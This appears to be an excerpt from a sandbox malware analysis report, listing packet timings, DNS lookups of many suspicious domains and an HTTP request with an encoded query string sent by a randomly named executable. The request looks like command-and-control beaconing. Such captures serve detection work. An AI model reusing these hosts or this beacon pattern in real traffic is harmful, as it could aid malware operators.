                                                                                                        Oct 10, 2024 14:47:06.000560045 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:06.005685091 CEST8050006162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:06.006604910 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:06.017105103 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:06.021995068 CEST8050006162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:06.543301105 CEST8050006162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:06.543340921 CEST8050006162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:06.543580055 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:07.528877974 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:08.550599098 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:08.555515051 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.555639982 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:08.566616058 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:08.571505070 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571535110 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571584940 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571611881 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571639061 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571665049 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571712017 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571738005 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571763992 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:09.117835045 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:09.117877007 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:09.117960930 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:10.078620911 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:11.097312927 CEST5002080192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:48.692938089 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.692965031 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.692991972 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.693097115 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.693187952 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.693214893 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.693242073 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:49.136388063 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:49.136452913 CEST5003180192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:50.201867104 CEST5003180192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:50.206938028 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.221693039 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.226680040 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.226871967 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.237350941 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.242173910 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684149981 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684226036 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684263945 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684273005 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684320927 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684364080 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684396029 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684407949 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684429884 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684448004 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684462070 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684494972 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684506893 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684526920 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684564114 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684566021 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684611082 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.689697981 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.694554090 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:56.799742937 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:56.804733038 CEST8050033109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:56.807526112 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:56.819595098 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:56.824528933 CEST8050033109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:57.431843042 CEST8050033109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:57.431869030 CEST8050033109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:57.431921005 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:58.326710939 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:59.348536015 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:59.353391886 CEST8050034109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:59.353482008 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:59.374453068 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:59.379360914 CEST8050034109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:59.962954044 CEST8050034109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:59.963109016 CEST8050034109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:59.963184118 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:00.889929056 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:01.944483042 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:01.949517965 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.949628115 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:01.973875999 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:01.978933096 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.978985071 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979006052 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979026079 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979046106 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979082108 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979100943 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979372025 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979418039 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:02.585396051 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:02.639514923 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:02.671298027 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:02.671401024 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:03.483033895 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:04.501583099 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:04.506752968 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:04.506911993 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:04.515564919 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:04.520442009 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:05.335777044 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:05.336114883 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:05.336208105 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:05.339410067 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:05.344240904 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.409929991 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:10.414855957 CEST80500373.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.419795990 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:10.430226088 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:10.435261965 CEST80500373.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.886801958 CEST80500373.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.886895895 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:11.936260939 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:11.942784071 CEST80500373.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:12.955714941 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:13.052773952 CEST80500383.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:13.055938959 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:13.069466114 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:13.074305058 CEST80500383.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:13.527718067 CEST80500383.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:13.527786970 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:14.577940941 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:14.584523916 CEST80500383.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.595892906 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:15.600876093 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.601003885 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:15.612699986 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:15.617594957 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617609024 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617624998 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617634058 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617643118 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617825031 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617834091 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617877960 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617889881 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:16.087260008 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:16.087395906 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:17.123888016 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:17.131762028 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.142957926 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.147845030 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.148128033 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.155544996 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.160317898 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.608920097 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.608963966 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.611443996 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.617851019 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.622647047 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:24.594590902 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:24.599370003 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:24.599487066 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:24.678086996 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:24.684094906 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:25.616406918 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:25.616467953 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:25.616503954 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:25.616554976 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:25.616554976 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:26.186537027 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:27.206526995 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:27.211443901 CEST8051588118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:27.211519957 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:27.224622965 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:27.229506016 CEST8051588118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:28.080588102 CEST8051588118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:28.080621958 CEST8051588118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:28.080677986 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:28.735093117 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:29.754645109 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:29.759772062 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.759845018 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:29.777321100 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:29.782262087 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782272100 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782363892 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782373905 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782388926 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782397985 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782404900 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782413006 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782421112 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:30.686443090 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:30.686484098 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:30.686537981 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:30.686701059 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:31.280298948 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:32.299016953 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:32.304045916 CEST8051590118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:32.306622982 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:32.314378977 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:32.319264889 CEST8051590118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:33.197685003 CEST8051590118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:33.197762966 CEST8051590118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:33.197843075 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:33.201734066 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:33.206521988 CEST8051590118.99.50.8192.168.2.4
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                        Oct 10, 2024 14:47:43.392874956 CEST5087253192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 14:47:43.526912928 CEST53508721.1.1.1192.168.2.4
                                                                                                        Oct 10, 2024 14:47:56.706437111 CEST5241053192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 14:47:56.796303034 CEST53524101.1.1.1192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.347500086 CEST6540953192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 14:48:10.404115915 CEST53654091.1.1.1192.168.2.4
                                                                                                        Oct 10, 2024 14:48:23.629122972 CEST5603353192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 14:48:23.637234926 CEST53560331.1.1.1192.168.2.4
                                                                                                        Oct 10, 2024 14:48:38.581146002 CEST5083753192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 14:48:39.593027115 CEST5083753192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 14:48:40.221577883 CEST53508371.1.1.1192.168.2.4
                                                                                                        Oct 10, 2024 14:48:40.225838900 CEST53508371.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 10, 2024 14:46:06.117371082 CEST | 192.168.2.4 | 1.1.1.1 | 0x2ca1 | Standard query (0) | www.sacidasorte.com | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:46:21.688386917 CEST | 192.168.2.4 | 1.1.1.1 | 0x6744 | Standard query (0) | www.yosoyemy.com | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:46:34.991847992 CEST | 192.168.2.4 | 1.1.1.1 | 0xb3e1 | Standard query (0) | www.go2super.app | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:46:49.173975945 CEST | 192.168.2.4 | 1.1.1.1 | 0xd341 | Standard query (0) | www.corverd.store | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:02.578471899 CEST | 192.168.2.4 | 1.1.1.1 | 0xc14e | Standard query (0) | www.66hc7.com | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:16.633563995 CEST | 192.168.2.4 | 1.1.1.1 | 0x909 | Standard query (0) | www.beescy.xyz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:30.033260107 CEST | 192.168.2.4 | 1.1.1.1 | 0x3aae | Standard query (0) | www.personalcaresale.shop | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:43.392874956 CEST | 192.168.2.4 | 1.1.1.1 | 0x78a5 | Standard query (0) | www.ainude2.cloud | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:56.706437111 CEST | 192.168.2.4 | 1.1.1.1 | 0x22f9 | Standard query (0) | www.yourtech-agency.com | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:48:10.347500086 CEST | 192.168.2.4 | 1.1.1.1 | 0xae36 | Standard query (0) | www.mybodyradar.net | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:48:23.629122972 CEST | 192.168.2.4 | 1.1.1.1 | 0x1abf | Standard query (0) | www.zt555.shop | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:48:38.581146002 CEST | 192.168.2.4 | 1.1.1.1 | 0xea70 | Standard query (0) | www.tigun.top | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:48:39.593027115 CEST | 192.168.2.4 | 1.1.1.1 | 0xea70 | Standard query (0) | www.tigun.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 10, 2024 14:46:06.175237894 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ca1 | No error (0) | www.sacidasorte.com | sacidasorte.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 14:46:06.175237894 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ca1 | No error (0) | sacidasorte.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:46:06.175237894 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ca1 | No error (0) | sacidasorte.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:46:21.752578020 CEST | 1.1.1.1 | 192.168.2.4 | 0x6744 | No error (0) | www.yosoyemy.com | connect.hostinger.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 14:46:21.752578020 CEST | 1.1.1.1 | 192.168.2.4 | 0x6744 | No error (0) | connect.hostinger.com | | 34.120.137.41 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:46:35.031366110 CEST | 1.1.1.1 | 192.168.2.4 | 0xb3e1 | No error (0) | www.go2super.app | go2super.app | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 14:46:35.031366110 CEST | 1.1.1.1 | 192.168.2.4 | 0xb3e1 | No error (0) | go2super.app | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:46:35.031366110 CEST | 1.1.1.1 | 192.168.2.4 | 0xb3e1 | No error (0) | go2super.app | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:46:49.235279083 CEST | 1.1.1.1 | 192.168.2.4 | 0xd341 | No error (0) | www.corverd.store | corverd.store | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 14:46:49.235279083 CEST | 1.1.1.1 | 192.168.2.4 | 0xd341 | No error (0) | corverd.store | | 81.88.48.71 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:03.446079969 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14e | No error (0) | www.66hc7.com | kloeti.pc205kopl.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 14:47:03.446079969 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14e | No error (0) | kloeti.pc205kopl.com | | 162.209.189.212 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:03.446079969 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14e | No error (0) | kloeti.pc205kopl.com | | 162.209.189.210 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:03.446079969 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14e | No error (0) | kloeti.pc205kopl.com | | 162.209.189.211 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:16.660387039 CEST | 1.1.1.1 | 192.168.2.4 | 0x909 | No error (0) | www.beescy.xyz | | 162.0.213.72 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:30.051413059 CEST | 1.1.1.1 | 192.168.2.4 | 0x3aae | No error (0) | www.personalcaresale.shop | | 104.21.21.230 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:30.051413059 CEST | 1.1.1.1 | 192.168.2.4 | 0x3aae | No error (0) | www.personalcaresale.shop | | 172.67.200.242 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:43.526912928 CEST | 1.1.1.1 | 192.168.2.4 | 0x78a5 | No error (0) | www.ainude2.cloud | ainude2.cloud | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 14:47:43.526912928 CEST | 1.1.1.1 | 192.168.2.4 | 0x78a5 | No error (0) | ainude2.cloud | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:47:56.796303034 CEST | 1.1.1.1 | 192.168.2.4 | 0x22f9 | No error (0) | www.yourtech-agency.com | yourtech-agency.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 14:47:56.796303034 CEST | 1.1.1.1 | 192.168.2.4 | 0x22f9 | No error (0) | yourtech-agency.com | | 109.234.166.180 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:48:10.404115915 CEST | 1.1.1.1 | 192.168.2.4 | 0xae36 | No error (0) | www.mybodyradar.net | mybodyradar.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 14:48:10.404115915 CEST | 1.1.1.1 | 192.168.2.4 | 0xae36 | No error (0) | mybodyradar.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:48:10.404115915 CEST | 1.1.1.1 | 192.168.2.4 | 0xae36 | No error (0) | mybodyradar.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:48:40.221577883 CEST | 1.1.1.1 | 192.168.2.4 | 0xea70 | No error (0) | www.tigun.top | | 23.249.190.35 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 14:48:40.225838900 CEST | 1.1.1.1 | 192.168.2.4 | 0xea70 | No error (0) | www.tigun.top | | 23.249.190.35 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:06.194684029 CEST | 488 | OUT | GET /dcai/?Sh=JzKwzxEjjJDs1ynMHer+TNevqF7oFKk+RBNCM6w6NpGOWZMZrcBh0esk0Vp2cdNARH8NLeIYDalhXOdQ0Ma7tvgTEF7hsrDYV+tcKJvJSVI5izhoL98hwXM=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.sacidasorte.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:46:06.642410994 CEST | 396 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:46:06 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 256
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sh=JzKwzxEjjJDs1ynMHer+TNevqF7oFKk+RBNCM6w6NpGOWZMZrcBh0esk0Vp2cdNARH8NLeIYDalhXOdQ0Ma7tvgTEF7hsrDYV+tcKJvJSVI5izhoL98hwXM=&f6SpQ=_n84nZ4HGta"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 34.120.137.41 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
